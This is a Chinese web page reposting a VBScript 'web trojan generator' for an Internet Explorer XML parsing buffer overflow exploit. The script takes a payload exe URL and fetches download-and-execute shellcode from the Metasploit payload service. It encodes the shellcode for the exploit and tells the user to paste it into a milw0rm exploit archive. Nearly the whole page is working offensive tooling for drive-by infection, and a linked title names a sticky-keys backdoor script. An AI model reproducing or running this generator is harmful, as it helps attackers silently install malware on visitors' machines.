网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

当前位置：首页 > 范文|应用文 > IT技术专栏 > 脚本栏目

来源：易贤网阅读：1204 次日期：2016-07-20 14:06:19

温馨提示：易贤网小编为您整理了“网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day”,方便广大网友查阅！

MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day利用代码

'code by lcx

On Error Resume Next

Exeurl = InputBox( "请输入exe的地址：", "输入", "http://www.haiyangtop.net/333.exe" )

url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload"

Body = getHTTPPage(url)

Set Re = New RegExp

Re.Pattern = "(\$shellcode \=[\s\S]+</div></pre>)"

Set Matches = Re.Execute(Body)

If Matches.Count>0 Then Body = Matches(0).value

code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))

function replaceregex(str)

set regex=new regExp

regex.pattern="\\x(..)\\x(..)"

regex.IgnoreCase=true

regex.global=true

matches=regex.replace(str,"%u$2$1")

replaceregex=matches

end Function

Function getHTTPPage(Path)

t = GetBody(Path)

getHTTPPage = BytesToBstr(t, "GB2312")

End Function

Function GetBody(url)

On Error Resume Next

Set Retrieval = CreateObject("Microsoft.XMLHTTP")

With Retrieval

.Open "Get", url, False, "", ""

.Send

GetBody = .ResponseBody

End With

Set Retrieval = Nothing

End Function

Function BytesToBstr(Body, Cset)

Dim objstream

Set objstream = CreateObject("adodb.stream")

objstream.Type = 1

objstream.Mode = 3

objstream.Open

objstream.Write Body

objstream.Position = 0

objstream.Type = 2

objstream.Charset = Cset

BytesToBstr = objstream.ReadText

objstream.Close

Set objstream = Nothing

End Function

Function URLEncoding(vstrIn)

strReturn = ""

For aaaa = 1 To Len(vstrIn)

ThisChr = Mid(vStrIn,aaaa,1)

If Abs(Asc(ThisChr)) < &HFF Then

strReturn = strReturn & ThisChr

Else

innerCode = Asc(ThisChr)

If innerCode < 0 Then

innerCode = innerCode + &H10000

End If

Hight8 = (innerCode And &HFF00)\ &HFF

Low8 = innerCode And &HFF

strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)

End If

URLEncoding = strReturn

End Function

set fso=CreateObject("scripting.filesystemobject")

set fileS=fso.opentextfile("a.txt",2,true)

fileS.writeline replaceregex(code)

'fileS.writeline body

wscript.echo replaceregex(code)

files.close

set fso=Nothing

wscript.echo Chr(13)&"ok，生成a.txt，请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"

上一篇：可自删除开启3389创建用户粘滞键后门的vbs

下一篇：IE浏览器增加“复制图像地址”的右键菜单的vbs代码

易贤网手机网站地址：网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

由于各方面情况的不断调整与变化，易贤网提供的所有考试信息和咨询回复仅供参考，敬请考生以权威部门公布的正式信息和咨询为准！